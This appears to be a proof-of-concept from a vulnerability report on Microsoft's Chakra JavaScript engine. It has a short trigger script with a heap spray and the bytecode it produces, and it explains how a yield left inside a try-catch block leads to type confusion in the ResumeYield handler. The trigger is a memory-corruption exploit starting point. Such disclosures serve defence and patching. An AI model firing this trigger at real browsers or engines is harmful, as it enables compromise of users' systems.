// PoC: async function trigger(a = class b { [await 1]() { } }) { } let spray = []; for (let i = 0; i < 100000; i++) { spray.push(parseFloat.bind(1, 0x1234, 0x1234, 0x1234, 0x1234)); } trigger(); /* The PoC is invalid JavaScript, but Chakra does parse it without any exception and generates incorrect bytecode from that. Here's the generated bytecode. Function trigger ( (#1.1), #2) (In0, In1) (size: 36 [34]) 18 locals (8 temps from R10), 5 inline cache Constant Table: ======== ===== R1 LdRoot R2 LdC_A_I4 int:1 R3 Ld_A (undefined) R4 LdFalse Implicit Arg Ins: ======== === === R5 ArgIn_AIn1 0000 InitUndecl R6 0002 TryCatch x:004c (71) Line 1: a = class b { Col 24: ^ 0005 BrSrNeq_Ax:0048 (62)R5R3 000a NewScFuncR13 = b() 000d InitClassR13 0012 ProfiledLdFldR14 = R13.prototype #0 <0> 0016 SetHomeObj R13R14 001b NewScObjectSimpleR9 001d ProfiledStFldR9.value = R2 #1 <1> 0021 ProfiledStFldR9.done = R4 #2 <2> 0025 YieldR9R9 <<----------------------------------------------- 0028 ResumeYieldR15R9 002b NewScFuncR16 = b.prototype[]() 002e SetComputedNameVar R16R15 0033 ProfiledLdFldR14 = R13.prototype #0 <0> 0037 InitClassMemberComputedName R14[R15] = R16 003d SetHomeObj R16R14 0042 InitConstR6R13 0045 Ld_A R5R13 0048 Leave 0049 Br x:0074 (40) 004c CatchR10 004e Nop 004f ProfiledLdRootFldR11 = root.Promise #4 <4> 0055 ProfiledLdMethodFldR12 = R11.reject #3 <3> 0059 StartCallArgCount: 2 005c ArgOut_A Out0 = R11 005f ArgOut_A Out1 = R10 0062 ProfiledCallIWithICIndex R12 = R12(ArgCount: 2) <3><0> 006c Ld_A R0R12 006f Leave 0070 Br x:0076 ( 3) 0073 Leave 0074 LdUndefR0 Line 5: } Col1: ^ 0076 Ret Yield operations shoud not be performed under a try-catch block, but incorrectly generated bytecode allowed it at (a). This will lead to type confusion in the InterpreterStackFrame::OP_ResumeYield method. */
体验盒子
